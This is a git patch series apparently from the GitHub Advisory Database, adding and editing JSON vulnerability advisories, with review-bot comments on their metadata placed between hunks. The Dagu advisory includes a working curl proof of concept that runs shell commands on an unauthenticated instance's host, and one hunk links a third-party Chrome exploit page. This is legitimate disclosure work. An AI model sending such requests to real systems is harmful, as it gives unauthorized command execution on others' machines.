diff --git a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json
index 61cca68f9347e..600283669463d 100644
--- a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json
+++ b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pmgj-wpmq-6xx5",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-24955"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Whizz Plugins whizz-plugins allows Reflected XSS.This issue affects Whizz Plugins: from n/a through <= 1.9.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:39Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json b/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json
new file mode 100644
index 0000000000000..713c3e2275151
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qv8j-hgpc-vrq8",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2472"
+ ],
+ "details": "Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Amber"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2472"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-011"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T20:25:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json
index 0c7963d6b7ddd..0ab746b310ee2 100644
--- a/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json
+++ b/advisories/unreviewed/2026/02/GHSA-r4m3-cm43-fxrj/GHSA-r4m3-cm43-fxrj.json
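Review bot: `"affected": []` is left empty in GHSA-qv8j-hgpc-vrq8 even though `details` names the package (google-cloud-aiplatform) and a version range (1.98.0 up to but not including 1.131.0), so tooling that matches on `affected` ranges will not flag installs of the SDK. Populating a package entry with introduced `1.98.0` and fixed `1.131.0` would make the record actionable; the ecosystem is presumably PyPI, but that should be confirmed against the vendor bulletin. Separately, the vector carries `PR:L` while the text says "unauthenticated remote attacker", which is worth reconciling before the advisory is reviewed. GHSA-wh2j-26j7-9728 later in the patch likewise leaves `affected` empty while giving its version range only in prose.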
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r4m3-cm43-fxrj",
- "modified": "2026-02-18T15:31:27Z",
+ "modified": "2026-02-20T21:31:20Z",
 "published": "2026-02-18T15:31:27Z",
 "aliases": [
 "CVE-2026-2329"
 ],
 "details": "An unauthenticated stack-based buffer overflow vulnerability exists in the HTTP API endpoint /cgi-bin/api.values.get. A remote attacker can leverage this vulnerability to achieve unauthenticated remote code execution (RCE) with root privileges on a target device. The vulnerability affects all six device models in the series: GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json b/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json
new file mode 100644
index 0000000000000..c9305e8865a51
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-r62q-p7vv-vh53/GHSA-r62q-p7vv-vh53.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r62q-p7vv-vh53",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2853"
+ ],
+ "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. This affects the function sub_462E14 of the file /boafrm/formSysLog of the component System Log Configuration Endpoint. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2853"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/10"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347092"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347092"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754456"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T20:25:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json
index 9f36ac3497bf5..bc631b5fdc5cc 100644
--- a/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json
+++ b/advisories/unreviewed/2026/02/GHSA-v754-wvf3-33xx/GHSA-v754-wvf3-33xx.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v754-wvf3-33xx",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22372"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Isida isida allows PHP Local File Inclusion.This issue affects Isida: from n/a through <= 1.4.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:36Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json
index fff849fc5b48c..680fbabad4dd1 100644
--- a/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json
+++ b/advisories/unreviewed/2026/02/GHSA-v859-79r4-4vv5/GHSA-v859-79r4-4vv5.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v859-79r4-4vv5",
- "modified": "2026-02-20T18:31:39Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:39Z",
 "aliases": [
 "CVE-2026-24959"
 ],
 "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in JoomSky JS Help Desk js-support-ticket allows Blind SQL Injection.This issue affects JS Help Desk: from n/a through <= 3.0.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-89"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:39Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json
index cc0af4ab5b99c..54bad9bca322d 100644
--- a/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json
+++ b/advisories/unreviewed/2026/02/GHSA-vmwq-q997-3c46/GHSA-vmwq-q997-3c46.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vmwq-q997-3c46",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:21Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22362"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Photolia photolia allows PHP Local File Inclusion.This issue affects Photolia: from n/a through <= 1.0.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:35Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json
index 9cb37fd2b1c65..28da835b79ca9 100644
--- a/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json
+++ b/advisories/unreviewed/2026/02/GHSA-w246-2vcp-75v8/GHSA-w246-2vcp-75v8.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w246-2vcp-75v8",
- "modified": "2026-02-20T18:31:40Z",
+ "modified": "2026-02-20T21:31:23Z",
 "published": "2026-02-20T18:31:40Z",
 "aliases": [
 "CVE-2026-27503"
 ],
 "details": "SVXportal version 2.5 and prior contain a reflected cross-site scripting vulnerability in admin/log.php via the search query parameter. When an authenticated administrator views a crafted URL, the application embeds the unsanitized parameter value directly into an HTML input value attribute, allowing attacker-supplied JavaScript to execute in the administrator's browser. This can enable session theft, administrative action forgery, or other browser-based compromise in the context of an admin user.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json b/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json
new file mode 100644
index 0000000000000..c06ed9f12a507
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wh2j-26j7-9728",
+ "modified": "2026-02-20T21:31:24Z",
+ "published": "2026-02-20T21:31:24Z",
+ "aliases": [
+ "CVE-2026-2473"
+ ],
+ "details": "Predictable bucket naming in Vertex AI Experiments in Google Cloud Vertex AI from version 1.21.0 up to (but not including) 1.133.0 on Google Cloud Platform allows an unauthenticated remote attacker to achieve cross-tenant remote code execution, model theft, and poisoning via pre-creating predictably named Cloud Storage buckets (Bucket Squatting).\n\nThis vulnerability was patched and no customer action is needed.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2473"
+ },
+ {
+ "type": "WEB",
+ "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-012"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-340"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T20:25:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json
index 953587e042e26..2fef22de5929b 100644
--- a/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json
+++ b/advisories/unreviewed/2026/02/GHSA-wrqv-46c5-q67w/GHSA-wrqv-46c5-q67w.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wrqv-46c5-q67w",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22383"
 ],
 "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-639"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:37Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json
index c819e34199f9c..1ce1871d939ac 100644
--- a/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json
+++ b/advisories/unreviewed/2026/02/GHSA-x57h-c6qr-3m4q/GHSA-x57h-c6qr-3m4q.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x57h-c6qr-3m4q",
- "modified": "2026-02-20T18:31:38Z",
+ "modified": "2026-02-20T21:31:22Z",
 "published": "2026-02-20T18:31:38Z",
 "aliases": [
 "CVE-2026-22376"
 ],
 "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Parkivia parkivia allows PHP Local File Inclusion.This issue affects Parkivia: from n/a through <= 1.1.9.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-98"
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-20T16:22:37Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json
index de22b2120f16e..2d3dc6b78d2e7 100644
--- a/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json
+++ b/advisories/unreviewed/2026/02/GHSA-xpp8-qpcr-c3rg/GHSA-xpp8-qpcr-c3rg.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xpp8-qpcr-c3rg",
- "modified": "2026-02-17T21:31:13Z",
+ "modified": "2026-02-20T21:31:20Z",
 "published": "2026-02-13T21:31:39Z",
 "aliases": [
 "CVE-2026-2441"
@@ -23,6 +23,10 @@
 "type": "WEB",
 "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/huseyinstif/CVE-2026-2441-PoC/blob/main/poc.html"
+ },
 {
 "type": "WEB",
 "url": "https://issues.chromium.org/issues/483569511"
From ebf4870fbe5715529df352fe787dccafbc9ceb8a Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com>
Date: Fri, 20 Feb 2026 21:46:14 +0000
Subject: [PATCH 26/77] Publish GHSA-6qr9-g2xw-cw92
---
 .../2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json b/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json
index 00ecec9f8597e..a5d216178a5c5 100644
--- a/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json
+++ b/advisories/github-reviewed/2026/02/GHSA-6qr9-g2xw-cw92/GHSA-6qr9-g2xw-cw92.json
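Review bot: The reference added in the second GHSA-xpp8-qpcr-c3rg hunk points at a third-party `poc.html` in a personal repository and is typed `WEB`, the same as the vendor release note and the Chromium issue beside it. Consumers that render `references` as plain links cannot tell vendor guidance from unvetted proof-of-concept content, and a `blob/main` URL can change after the sync. If the schema version in use accepts a more specific reference type for demonstrations, such as `"type": "EVIDENCE"`, I would use it here. I would also pin the URL to a commit hash instead of `main`.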
@@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-6qr9-g2xw-cw92", - "modified": "2026-02-19T22:04:39Z", + "modified": "2026-02-20T21:44:24Z", "published": "2026-02-19T22:04:39Z", "aliases": [], "summary": "Dagu affected by unauthenticated RCE via inline DAG spec in default configuration", - "details": "### Summary\n\nDagu's default configuration ships with authentication completely disabled. The `POST /api/v2/dag-runs` endpoint accepts an inline YAML spec and executes its shell commands immediately — no credentials, no token, nothing. Any dagu instance reachable over the network is fully compromised by default. A second issue means that even with auth properly configured, operator-role users can still execute arbitrary commands by submitting inline specs through the same endpoint.\n\n### Details\n\n**Finding 1 — Unauthenticated RCE (default config)**\n\n`internal/service/app/config/loader.go:226` sets `AuthModeNone` as the default. With no auth mode configured, `internal/frontend/api/v2/handlers/api.go:520` returns nil from `requireExecute()` — all permission checks pass without a valid session.\n\nThe `POST /api/v2/dag-runs` endpoint accepts a `spec` field containing a full YAML DAG definition. The spec is loaded, the steps are parsed, and the commands execute immediately on the host. There is no validation of the spec content beyond YAML parsing.\n\nTested on `ghcr.io/dagu-org/dagu:latest` — the endpoint responds with a `dagRunId` and the command runs within milliseconds.\n\n**Finding 2 — Operator role privilege escalation (auth-enabled instances)**\n\n`internal/frontend/api/v2/handlers/dagruns.go:56` guards the dag-runs endpoint with `requireExecute()`. The operator role has `CanExecute=true` but `CanWrite=false` (`internal/auth/role.go:63-69`) — operators are supposed to run existing DAGs, not create new ones.\n\nBut submitting an inline spec to `POST /api/v2/dag-runs` is effectively a create-and-execute operation. 
The endpoint never calls `requireDAGWrite()`. So an operator can paste arbitrary shell commands into the spec field and execute them — the same result as admin — while being correctly blocked from `POST /api/v2/dags`. This applies even when authentication is fully enabled and correctly configured.\n\n**Finding 3 — Backtick command injection in step parameters**\n\n`internal/cmn/eval/substitute.go:57-78` evaluates backtick-delimited expressions in step parameter values by passing them to `sh -c`. There is no sanitization on parameter values before they reach this function. Any user who can trigger a DAG run with custom parameters can inject arbitrary commands via backtick substitution.\n\n### PoC\n\nFinding 1 — no credentials needed, works on any default install:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v2/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"name\":\"poc\",\"spec\":\"steps:\\n - name: rce\\n command: id > /tmp/pwned\\n\"}'\n\n# Response: {\"dagRunId\":\"\"}\n# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu) groups=1000(dagu)\n```\n\nTested and confirmed on the default Docker image with no configuration changes.\n\n### Impact\n\nEvery dagu deployment using default settings — which is every Docker deployment, every install following the documentation, and every instance without explicit `DAGU_AUTH_MODE` configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user and access to everything the process can reach.\n\nFinding 2 means the problem doesn't fully go away by enabling auth. Operator-level accounts can still escalate to arbitrary command execution regardless of the auth configuration.", + "details": "### Summary\nDagu's default configuration ships with authentication disabled. 
The `POST /api/v2/dag-runs` endpoint accepts an inline YAML spec and executes its shell commands immediately with no credentials required — any dagu instance reachable over the network is fully compromised by default.\n\n### Details\n`internal/service/app/config/loader.go:226` sets `AuthModeNone` as the default. With no auth mode configured, `internal/frontend/api/v2/handlers/api.go:520` returns `nil` from `requireExecute()` — all permission checks pass without a valid session.\n\nThe `POST /api/v2/dag-runs` endpoint accepts a `spec` field containing a full YAML DAG definition. The spec is parsed and the commands execute immediately on the host with no validation beyond YAML parsing.\n\n### PoC\n```bash\ncurl -s -X POST http://TARGET:8080/api/v2/dag-runs \\\n -H \"Content-Type: application/json\" \\\n -d '{\"name\":\"poc\",\"spec\":\"steps:\\n - name: rce\\n command: id > /tmp/pwned\\n\"}'\n# Response: {\"dagRunId\":\"\"}\n# /tmp/pwned contains: uid=1000(dagu) gid=1000(dagu)\n```\nConfirmed on `ghcr.io/dagu-org/dagu:latest` with no configuration changes.\n\n### Impact\nEvery dagu deployment using default settings — every Docker deployment, every install following the documentation, every instance without explicit `DAGU_AUTH_MODE` configuration — is fully compromised without credentials. An attacker with network access gets OS command execution as the dagu process user.", "severity": [ { "type": "CVSS_V3", From 3c5089dd9bd9473bda8853ae151a7f61f7aa15dc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:49:56 +0000 Subject: [PATCH 27/77] Publish GHSA-8j8w-wwqc-x596 --- .../2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) 
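Review bot: The rewritten `details` in GHSA-6qr9-g2xw-cw92 drops Finding 2 (the operator role reaching `POST /api/v2/dag-runs` without `requireDAGWrite()`) and Finding 3 (backtick evaluation in `internal/cmn/eval/substitute.go`), along with the sentence saying that enabling auth does not fully remove the problem. A reader of the new text will likely conclude that setting `DAGU_AUTH_MODE` is a complete mitigation, which the removed text contradicted. If those two findings are now tracked separately, say so at the end of `details`, e.g. `Operator-role execution of inline specs and backtick substitution in step parameters are tracked in <GHSA-id-placeholder>.`; if they are not, keep them in this record. The hunk ends inside the `severity` array, so whether the CVSS vector was adjusted to the narrower scope is not visible here.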
diff --git a/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json b/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json index 5a873cecb5e2e..ee249eca92a28 100644 --- a/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json +++ b/advisories/github-reviewed/2025/06/GHSA-8j8w-wwqc-x596/GHSA-8j8w-wwqc-x596.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8j8w-wwqc-x596", - "modified": "2025-12-22T18:41:25Z", + "modified": "2026-02-20T21:48:11Z", "published": "2025-06-02T06:30:32Z", "aliases": [ "CVE-2025-49113" @@ -99,6 +99,10 @@ "type": "WEB", "url": "https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-49113" + }, { "type": "WEB", "url": "https://www.vicarius.io/vsociety/posts/cve-2025-49113-roundcube-mitigation-script" From d19ea1e99c4dd88a4de5a5eef0ee09ba27e276bb Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 21:54:41 +0000 Subject: [PATCH 28/77] Publish GHSA-cxpw-2g23-2vgw --- .../GHSA-cxpw-2g23-2vgw.json | 76 +++++++++++++++++++ 1 file changed, 76 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json diff --git a/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json new file mode 100644 index 0000000000000..0c624b24b1508 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-cxpw-2g23-2vgw/GHSA-cxpw-2g23-2vgw.json 
@@ -0,0 +1,76 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cxpw-2g23-2vgw", + "modified": "2026-02-20T21:52:44Z", + "published": "2026-02-20T21:52:44Z", + "aliases": [ + "CVE-2026-27576" + ], + "summary": "OpenClaw: ACP prompt-size checks missing in local stdio bridge could reduce responsiveness with very large inputs", + "details": "## Vulnerability\n\nThe ACP bridge accepted very large prompt text blocks and could assemble oversized prompt payloads before forwarding them to `chat.send`.\n\nBecause ACP runs over local stdio, this mainly affects local ACP clients (for example IDE integrations) that send unusually large inputs.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.17`\n- Patched version: `2026.2.18` (planned next release)\n\n## Impact\n\n- Local ACP sessions may become less responsive when very large prompts are submitted\n- Larger-than-expected model usage/cost when oversized text is forwarded\n- No privilege escalation and no direct remote attack path in the default ACP model\n\n## Affected Components\n\n- `src/acp/event-mapper.ts`\n- `src/acp/translator.ts`\n\n## Remediation\n\n- Enforce a 2 MiB prompt-text limit before concatenation\n- Count 